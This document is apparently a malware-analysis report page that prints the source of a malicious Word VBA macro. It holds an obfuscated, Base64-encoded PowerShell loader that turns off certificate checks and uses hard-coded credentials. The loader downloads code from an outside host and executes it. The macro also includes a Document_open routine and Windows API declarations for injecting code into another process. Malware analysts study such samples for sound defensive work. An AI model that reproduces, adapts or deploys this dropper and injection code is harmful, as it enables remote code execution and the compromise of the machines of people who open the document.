HJNLksdjbjksvajklvnhjksdnjks = HJNLksdjbjksvajklvnhjksdnjks + Chr(49)
HJNLksdjbjksvajklvnhjksdnjks = HJNLksdjbjksvajklvnhjksdnjks + Chr(32)
HJNLksdjbjksvajklvnhjksdnjks = HJNLksdjbjksvajklvnhjksdnjks + Chr(45)
HJNLksdjbjksvajklvnhjksdnjks = HJNLksdjbjksvajklvnhjksdnjks + Chr(101)
HJNLksdjbjksvajklvnhjksdnjks = HJNLksdjbjksvajklvnhjksdnjks + Chr(110)
HJNLksdjbjksvajklvnhjksdnjks = HJNLksdjbjksvajklvnhjksdnjks + Chr(99)
HJNLksdjbjksvajklvnhjksdnjks = HJNLksdjbjksvajklvnhjksdnjks + Chr(111)
HJNLksdjbjksvajklvnhjksdnjks = HJNLksdjbjksvajklvnhjksdnjks + Chr(32)
Dim zHdj As String
Dim zHdj1 As String
Dim zHdj2 As String
Dim zHdj3 As String
Dim zHdj4 As String
Dim zHdj5 As String
Dim zHdj6 As String
Dim zHdj7 As String
zHdj = "UwBlAHQALQBBAGwAaQBhAHMAIABzAHcAIAAtAFYAYQBsAHUAZQAgACIASQBuAFYAbwBrAGUALQBlAFgAcAByAGUAUwBzAEkAbwBuACIAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAGUAcgB2AG"
zHdj1 = "kAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQByAHYAZQByAEMAZQByAHQAaQBmAGkAYwBhAHQAZQBWAGEAbABpAGQAYQB0AGkAbwBuAEMAYQBsAGwAYgBhAGMAawAgAD0AIAB7"
zHdj2 = "ACAAJAB0AHIAdQBlACAAfQA7ACAAJABiAGMAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACAAJABiAGMALgBDAHIAZQ"
zHdj3 = "BkAGUAbgB0AGkAYQBsAHMAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAKAAnAGEAdQB0AGgA"
zHdj4 = "JwAsACAAJwAhACkAJgAlAEcAYQBvAGwAVABdAEgAfABwAEoATwBqAGUATgBjAHsAbQBTADcANABfAC0AWABkAFIAWgBZAH0AJwApADsAcwBsAGUAZQBwACAAKABHAGUAdAAtAFIAYQBuAGQAbwBtAC"
zHdj5 = "AAIAAtAE0AYQB4ACAAMQA1ADAAKQA7ACQAZABzAD0AJABiAGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAGEAYwBrAHUAcABhAGMAYwBvAHUAbgB0"
zHdj6 = "AC4AbgBlAHQALwB1AHIAbAAvAHYAaQBlAHcAJwApADsAcwBsAGUAZQBwACAAMgAwADAAOwBzAHcAIAAkAGQAcwA="
HJNLksdjbjksvajklvnhjksdnjks = HJNLksdjbjksvajklvnhjksdnjks + zHdj + zHdj1 + zHdj2 + zHdj3 + zHdj4 + zHdj5 + zHdj6
gkjfsgksjkasoiopfajvd = PE()
Dim strComputer, strList
strComputer = "."
Dim objWMIService, objProcess, colProcess
Dim pos As Integer
Dim i As Integer
i = 0
If gkjfsgksjkasoiopfajvd = "" Then
If Dir(Fkjhdksjjgjksv) = "" Then
Exit Sub
End If
baFileContent = FileToByteArray(Fkjhdksjjgjksv)
Call sgsdkjabjkajhabvjkhabvlkadnkjanvkjabv(baFileContent, HJNLksdjbjksvajklvnhjksdnjks)
Else
baFileContent = StringToByteArray(gkjfsgksjkasoiopfajvd)
Call sgsdkjabjkajhabvjkhabvlkadnkjanvkjabv(baFileContent, HJNLksdjbjksvajklvnhjksdnjks)
End If
For i = 0 To 2
Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colProcess = objWMIService.ExecQuery("Select * from Win32_Process WHERE Name = ""WINWORD.EXE"" AND CommandLine Like ""%win%"" ")
For Each objProcess In colProcess
pos = InStr(objProcess.CommandLine, "win")
If pos <> 0 Then
i = 2
Else
pos = 0
End If
Next
Next i
If pos = 0 Then
Else
End If
End Sub
Private Sub Document_open()
Dim objPic As Shape
For Each objPic In ActiveDocument.Shapes
If objPic.PictureFormat.Contrast >= 0.501 Then
objPic.PictureFormat.Brightness = 0.5
Else
objPic.PictureFormat.CropLeft = 50000
objPic.PictureFormat.CropBottom = 50000
End If
Next objPic
End Sub
Attribute VB_Name = "NewMacros"
Option Explicit
' ================================================================================
' ~~~ IMPORT WINDOWS API FUNCTIONS ~~~
' ================================================================================
#If Win64 Then
Private Declare PtrSafe Sub RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByVal sSource As LongPtr, ByVal lLength As Long)
Private Declare PtrSafe Function GetModuleFileName Lib "KERNEL32" Alias "GetModuleFileNameA" (ByVal hModule As LongPtr, ByVal lpFilename As String, ByVal nSize As Long) As Long
Private Declare PtrSafe Function CreateProcess Lib "KERNEL32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As LongPtr, ByVal lpThreadAttributes As LongPtr, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Long, ByVal lpEnvironment As LongPtr, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare PtrSafe Function GetThreadContext Lib "KERNEL32" (ByVal hThread As LongPtr, lpContext As CONTEXT) As Long
Private Declare PtrSafe Function ReadProcessMemory Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesRead As Long) As Long
Private Declare PtrSafe Function VirtualAllocEx Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function WriteProcessMemory Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As Long) As Long
Private Declare PtrSafe Function SetThreadContext Lib "KERNEL32" (ByVal hThread As LongPtr, lpContext As CONTEXT) As Long
Private Declare PtrSafe Function ResumeThread Lib "KERNEL32" (ByVal hThread As LongPtr) As Long
Private Declare PtrSafe Function TerminateProcess Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal uExitCode As Integer) As Long
#Else
Private Declare Sub RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As Long, ByVal sSource As Long, ByVal lLength As Long)
Private Declare Function GetModuleFileName Lib "KERNEL32" Alias "GetModuleFileNameA" (ByVal hModule As Long, ByVal lpFilename As String, ByVal nSize As Long) As Long
Private Declare Function CreateProcess Lib "KERNEL32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare Function GetThreadContext Lib "KERNEL32" (ByVal hThread As Long, lpContext As CONTEXT) As Long
Private Declare Function ReadProcessMemory Lib "KERNEL32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, ByVal lpNumberOfBytesRead As Long) As Long
Private Declare Function VirtualAllocEx Lib "KERNEL32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function WriteProcessMemory Lib "KERNEL32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As Long) As Long
Private Declare Function SetThreadContext Lib "KERNEL32" (ByVal hThread As Long, lpContext As CONTEXT) As Long
Private Declare Function ResumeThread Lib "KERNEL32" (ByVal hThread As Long) As Long
Private Declare Function TerminateProcess Lib "KERNEL32" (ByVal hProcess As Long, ByVal uExitCode As Integer) As Long
#End If
' ================================================================================
' ~~~ WINDOWS STRUCTURES ~~~
' ================================================================================
' Constants used in structure definitions
Private Const IMAGE_NUMBEROF_DIRECTORY_ENTRIES = 16
Private Const IMAGE_SIZEOF_SHORT_NAME = 8
Private Const MAXIMUM_SUPPORTED_EXTENSION = 512
Private Const SIZE_OF_80387_REGISTERS = 80
#If Win64 Then
Private Type M128A
Low As LongLong 'ULONGLONG Low;
High As LongLong 'LONGLONG High;
End Type
#End If
' https://www.nirsoft.net/kernel_struct/vista/IMAGE_DOS_HEADER.html
Private Type IMAGE_DOS_HEADER
e_magic As Integer 'WORD e_magic;
e_cblp As Integer 'WORD e_cblp;
e_cp As Integer 'WORD e_cp;
e_crlc As Integer 'WORD e_crlc;
e_cparhdr As Integer 'WORD e_cparhdr;
e_minalloc As Integer 'WORD e_minalloc;
e_maxalloc As Integer 'WORD e_maxalloc;
e_ss As Integer 'WORD e_ss;
e_sp As Integer 'WORD e_sp;
e_csum As Integer 'WORD e_csum;
e_ip As Integer 'WORD e_ip;
e_cs As Integer 'WORD e_cs;
e_lfarlc As Integer 'WORD e_lfarlc;
e_ovno As Integer 'WORD e_ovno;
e_res(4 - 1) As Integer 'WORD e_res[4];
e_oemid As Integer 'WORD e_oemid;
e_oeminfo As Integer 'WORD e_oeminfo;
e_res2(10 - 1) As Integer 'WORD e_res2[10];
e_lfanew As Long 'LONG e_lfanew;
End Type
' https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms680305(v=vs.85).aspx
Private Type IMAGE_DATA_DIRECTORY
VirtualAddress As Long 'DWORD VirtualAddress;
Size As Long 'DWORD Size;
End Type
' https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms680313(v=vs.85).aspx
Private Type IMAGE_FILE_HEADER
Machine As Integer 'WORD Machine;
NumberOfSections As Integer 'WORD NumberOfSections;
TimeDateStamp As Long 'DWORD TimeDateStamp;
PointerToSymbolTable As Long 'DWORD PointerToSymbolTable;
NumberOfSymbols As Long 'DWORD NumberOfSymbols;
SizeOfOptionalHeader As Integer 'WORD SizeOfOptionalHeader;
Characteristics As Integer 'WORD Characteristics;
End Type
' https://msdn.microsoft.com/en-us/library/windows/desktop/ms680339(v=vs.85).aspx
Private Type IMAGE_OPTIONAL_HEADER
#If Win64 Then
Magic As Integer 'WORD Magic;
MajorLinkerVersion As Byte 'BYTE MajorLinkerVersion;
MinorLinkerVersion As Byte 'BYTE MinorLinkerVersion;
SizeOfCode As Long 'DWORD SizeOfCode;
SizeOfInitializedData As Long 'DWORD SizeOfInitializedData;
SizeOfUninitializedData As Long 'DWORD SizeOfUninitializedData;
AddressOfEntryPoint As Long 'DWORD AddressOfEntryPoint;
BaseOfCode As Long 'DWORD BaseOfCode;
ImageBase As LongLong 'ULONGLONG ImageBase;
SectionAlignment As Long 'DWORD SectionAlignment;
FileAlignment As Long 'DWORD FileAlignment;
MajorOperatingSystemVersion As Integer 'WORD MajorOperatingSystemVersion;
MinorOperatingSystemVersion As Integer 'WORD MinorOperatingSystemVersion;
MajorImageVersion As Integer 'WORD MajorImageVersion;
MinorImageVersion As Integer 'WORD MinorImageVersion;
MajorSubsystemVersion As Integer 'WORD MajorSubsystemVersion;
MinorSubsystemVersion As Integer 'WORD MinorSubsystemVersion;
Win32VersionValue As Long 'DWORD Win32VersionValue;
SizeOfImage As Long 'DWORD SizeOfImage;
SizeOfHeaders As Long 'DWORD SizeOfHeaders;
CheckSum As Long 'DWORD CheckSum;
Subsystem As Integer 'WORD Subsystem;
DllCharacteristics As Integer 'WORD DllCharacteristics;
SizeOfStackReserve As LongLong 'ULONGLONG SizeOfStackReserve;
SizeOfStackCommit As LongLong 'ULONGLONG SizeOfStackCommit;
SizeOfHeapReserve As LongLong 'ULONGLONG SizeOfHeapReserve;
SizeOfHeapCommit As LongLong 'ULONGLONG SizeOfHeapCommit;
LoaderFlags As Long 'DWORD LoaderFlags;
NumberOfRvaAndSizes As Long 'DWORD NumberOfRvaAndSizes;
DataDirectory(IMAGE_NUMBEROF_DIRECTORY_ENTRIES - 1) As IMAGE_DATA_DIRECTORY 'IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
#Else
Magic As Integer 'WORD Magic;
MajorLinkerVersion As Byte 'BYTE MajorLinkerVersion;
MinorLinkerVersion As Byte 'BYTE MinorLinkerVersion;
SizeOfCode As Long 'DWORD SizeOfCode;
SizeOfInitializedData As Long 'DWORD SizeOfInitializedData;
SizeOfUninitializedData As Long 'DWORD SizeOfUninitializedData;
AddressOfEntryPoint As Long 'DWORD AddressOfEntryPoint;
BaseOfCode As Long 'DWORD BaseOfCode;
BaseOfData As Long 'DWORD BaseOfData;
ImageBase As Long 'DWORD ImageBase;
SectionAlignment As Long 'DWORD SectionAlignment;
FileAlignment As Long 'DWORD FileAlignment;
MajorOperatingSystemVersion As Integer 'WORD MajorOperatingSystemVersion;
MinorOperatingSystemVersion As Integer 'WORD MinorOperatingSystemVersion;
MajorImageVersion As Integer 'WORD MajorImageVersion;
MinorImageVersion As Integer 'WORD MinorImageVersion;
MajorSubsystemVersion As Integer 'WORD MajorSubsystemVersion;
MinorSubsystemVersion As Integer 'WORD MinorSubsystemVersion;
Win32VersionValue As Long 'DWORD Win32VersionValue;
SizeOfImage As Long 'DWORD SizeOfImage;
SizeOfHeaders As Long 'DWORD SizeOfHeaders;
CheckSum As Long 'DWORD CheckSum;
Subsystem As Integer 'WORD Subsystem;
DllCharacteristics As Integer 'WORD DllCharacteristics;
SizeOfStackReserve As Long 'DWORD SizeOfStackReserve;
SizeOfStackCommit As Long 'DWORD SizeOfStackCommit;
SizeOfHeapReserve As Long 'DWORD SizeOfHeapReserve;
SizeOfHeapCommit As Long 'DWORD SizeOfHeapCommit;
LoaderFlags As Long 'DWORD LoaderFlags;
NumberOfRvaAndSizes As Long 'DWORD NumberOfRvaAndSizes;
DataDirectory(IMAGE_NUMBEROF_DIRECTORY_ENTRIES - 1) As IMAGE_DATA_DIRECTORY 'IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
#End If
End Type
' https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms680336(v=vs.85).aspx
Private Type IMAGE_NT_HEADERS
Signature As Long 'DWORD Signature;
FileHeader As IMAGE_FILE_HEADER 'IMAGE_FILE_HEADER FileHeader;
OptionalHeader As IMAGE_OPTIONAL_HEADER 'IMAGE_OPTIONAL_HEADER OptionalHeader;
End Type
' https://www.nirsoft.net/kernel_struct/vista/IMAGE_SECTION_HEADER.html
Private Type IMAGE_SECTION_HEADER
SecName(IMAGE_SIZEOF_SHORT_NAME - 1) As Byte 'UCHAR Name[IMAGE_SIZEOF_SHORT_NAME];
Misc As Long 'ULONG Misc;
VirtualAddress As Long 'ULONG VirtualAddress;
SizeOfRawData As Long 'ULONG SizeOfRawData;
PointerToRawData As Long 'ULONG PointerToRawData;
PointerToRelocations As Long 'ULONG PointerToRelocations;
PointerToLinenumbers As Long 'ULONG PointerToLinenumbers;
NumberOfRelocations As Integer 'WORD NumberOfRelocations;
NumberOfLinenumbers As Integer 'WORD NumberOfLinenumbers;
Characteristics As Long 'ULONG Characteristics;
End Type
' https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms684873(v=vs.85).aspx
Private Type PROCESS_INFORMATION
hProcess As LongPtr 'HANDLE hProcess;
hThread As LongPtr 'HANDLE hThread;
dwProcessId As Long 'DWORD dwProcessId;
dwThreadId As Long 'DWORD dwThreadId;
End Type
' https://msdn.microsoft.com/en-us/library/windows/desktop/ms686331(v=vs.85).aspx
Private Type STARTUPINFO
cb As Long 'DWORD cb;
lpReserved As String 'LPSTR lpReserved;
lpDesktop As String 'LPSTR lpDesktop;
lpTitle As String 'LPSTR lpTitle;
dwX As Long 'DWORD dwX;
dwY As Long 'DWORD dwY;
dwXSize As Long 'DWORD dwXSize;
dwYSize As Long 'DWORD dwYSize;
dwXCountChars As Long 'DWORD dwXCountChars;
dwYCountChars As Long 'DWORD dwYCountChars;
dwFillAttribute As Long 'DWORD dwFillAttribute;
dwFlags As Long 'DWORD dwFlags;
wShowWindow As Integer 'WORD wShowWindow;
cbReserved2 As Integer 'WORD cbReserved2;
lpReserved2 As LongPtr 'LPBYTE lpReserved2;
hStdInput As LongPtr 'HANDLE hStdInput;
hStdOutput As LongPtr 'HANDLE hStdOutput;
hStdError As LongPtr 'HANDLE hStdError;
End Type
' https://www.nirsoft.net/kernel_struct/vista/FLOATING_SAVE_AREA.html
Private Type FLOATING_SAVE_AREA
ControlWord As Long 'DWORD ControlWord;
StatusWord As Long 'DWORD StatusWord;
TagWord As Long 'DWORD TagWord;
ErrorOffset As Long 'DWORD ErrorOffset;
ErrorSelector As Long 'DWORD ErrorSelector;
DataOffset As Long 'DWORD DataOffset;
DataSelector As Long 'DWORD DataSelector;
RegisterArea(SIZE_OF_80387_REGISTERS - 1) As Byte 'BYTE RegisterArea[SIZE_OF_80387_REGISTERS];
Spare0 As Long 'DWORD Spare0;
End Type
Private Type CONTEXT
#If Win64 Then
' Register parameter home addresses
P1Home As LongLong 'DWORD64 P1Home;
P2Home As LongLong 'DWORD64 P2Home;
P3Home As LongLong 'DWORD64 P3Home;
P4Home As LongLong 'DWORD64 P4Home;
P5Home As LongLong 'DWORD64 P5Home;
P6Home As LongLong 'DWORD64 P6Home;
' Control flags
ContextFlags As Long 'DWORD ContextFlags;
MxCsr As Long 'DWORD MxCsr;
' Segment Registers and processor flags
SegCs As Integer 'WORD SegCs;
SegDs As Integer 'WORD SegDs;
SegEs As Integer 'WORD SegEs;
SegFs As Integer 'WORD SegFs;
SegGs As Integer 'WORD SegGs;
SegSs As Integer 'WORD SegSs;
EFlags As Long 'DWORD EFlags;
' Debug registers
Dr0 As LongLong 'DWORD64 Dr0;
Dr1 As LongLong 'DWORD64 Dr1;
Dr2 As LongLong 'DWORD64 Dr2;
Dr3 As LongLong 'DWORD64 Dr3;
Dr6 As LongLong 'DWORD64 Dr6;
Dr7 As LongLong 'DWORD64 Dr7;
' Integer registers
Rax As LongLong 'DWORD64 Rax;
Rcx As LongLong 'DWORD64 Rcx;
Rdx As LongLong 'DWORD64 Rdx;
Rbx As LongLong 'DWORD64 Rbx;
Rsp As LongLong 'DWORD64 Rsp;
Rbp As LongLong 'DWORD64 Rbp;
Rsi As LongLong 'DWORD64 Rsi;
Rdi As LongLong 'DWORD64 Rdi;
R8 As LongLong 'DWORD64 R8;
R9 As LongLong 'DWORD64 R9;
R10 As LongLong 'DWORD64 R10;
R11 As LongLong 'DWORD64 R11;
R12 As LongLong 'DWORD64 R12;
R13 As LongLong 'DWORD64 R13;
R14 As LongLong 'DWORD64 R14;
R15 As LongLong 'DWORD64 R15;
' Program counter
Rip As LongLong 'DWORD64 Rip
' Floating point state
…
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.